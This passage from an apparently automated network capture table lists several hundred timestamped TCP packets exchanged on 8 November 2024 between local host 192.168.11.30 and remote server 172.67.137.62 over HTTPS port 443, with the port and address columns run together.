                                                                                      Nov 8, 2024 10:47:25.284017086 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284060955 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284061909 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284110069 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284110069 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284113884 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.284158945 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284634113 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.284645081 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.284765959 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284769058 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.284815073 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284815073 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284863949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284913063 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284961939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.284996033 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.285005093 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.285120010 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285166025 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285166025 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285218954 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285218954 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285222054 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.285264015 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.285958052 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.285969019 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.286092043 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.286096096 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.286142111 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.286142111 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.286144972 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.286238909 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.286242008 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.286293030 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.286355019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480359077 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480426073 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480515003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480515003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480560064 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480560064 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480565071 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480607986 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480674982 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480685949 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480705976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480710030 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.480813026 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480858088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480858088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.480968952 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481514931 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.481524944 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.481654882 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481707096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481707096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481709957 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.481755018 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481803894 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.481901884 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486201048 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486212015 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486361980 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486361980 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486408949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486412048 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486530066 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486530066 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486619949 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486639977 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486751080 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486845016 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486845016 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486849070 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.486974955 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.486991882 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487020016 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487183094 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487183094 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487186909 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487297058 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487297058 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487318039 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487395048 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487504959 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487504959 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487509012 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487608910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487608910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487674952 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487684965 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487833023 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487833023 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487878084 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487880945 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487960100 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.487976074 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487976074 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.487981081 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488076925 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488080025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488171101 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488171101 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488285065 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488291025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488301039 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488430977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488430977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488547087 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488550901 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488675117 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488682032 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488692999 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488857031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488857031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.488862038 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.488904953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489002943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489002943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489448071 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.489459038 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.489584923 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489633083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489633083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489638090 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.489681959 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489682913 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.489847898 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490067959 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490078926 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490195990 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490247965 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490247965 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490252018 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490293026 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490293026 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490392923 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490482092 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490492105 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490612030 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490612030 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490663052 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490665913 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.490711927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490761042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.490859032 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.491477966 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.491487026 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.491626024 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.491626024 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.491673946 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.491673946 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.491677999 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.491859913 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.492300034 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.492319107 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.492458105 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.492526054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.492526054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.492530107 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.492655993 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493503094 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.493513107 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.493669987 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493669987 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493674040 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.493719101 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493767977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493817091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.493849993 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.493859053 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.493978977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494028091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494028091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494031906 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.494081020 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494177103 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494657993 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.494668007 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.494823933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494823933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494875908 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494879007 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.494925976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.494925976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495060921 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495577097 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.495596886 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.495723963 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495723963 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495769978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495769978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495774031 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.495819092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.495944977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496460915 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.496474028 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.496608019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496608019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496654034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496654034 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496658087 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.496702909 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.496807098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497437000 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.497447014 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.497582912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497582912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497628927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497628927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497632980 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.497678041 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.497777939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.498300076 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.498311043 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.498437881 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.498532057 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.498532057 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.498536110 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.498676062 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499125957 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499136925 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499257088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499305964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499305964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499310017 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499357939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499357939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499453068 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499730110 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499751091 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499883890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499883890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499929905 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499929905 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.499933004 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.499979019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.500078917 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501312971 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.501322985 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.501482964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501482964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501528978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501532078 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.501578093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501626968 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.501682043 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.504657030 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.504667044 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.504807949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.504807949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.504857063 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.504857063 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.504861116 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.504955053 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505016088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505033016 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505110025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505184889 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505186081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505234003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505234003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505238056 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505331993 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505383015 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505383015 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505388021 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505526066 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505530119 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505574942 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505578041 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505681992 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505682945 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505717039 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505776882 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505779982 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.505861044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505939960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505939960 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.505987883 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506056070 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506064892 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506189108 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506268024 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506268024 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506270885 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506349087 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506400108 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506407022 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506411076 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506488085 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506536961 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506628036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506691933 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506766081 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506849051 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506850004 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506897926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506901026 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.506947041 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.506995916 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.507045031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.507051945 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.507118940 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.507265091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.507268906 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.507343054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.507463932 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.507941961 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.507952929 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.508152008 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.508156061 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.508217096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.508296013 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.508797884 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.508807898 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.508959055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.508959055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.508963108 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.509056091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.509141922 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.509624958 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.509643078 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.509932995 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.509932995 CET49777443192.168.11.30172.67.137.62
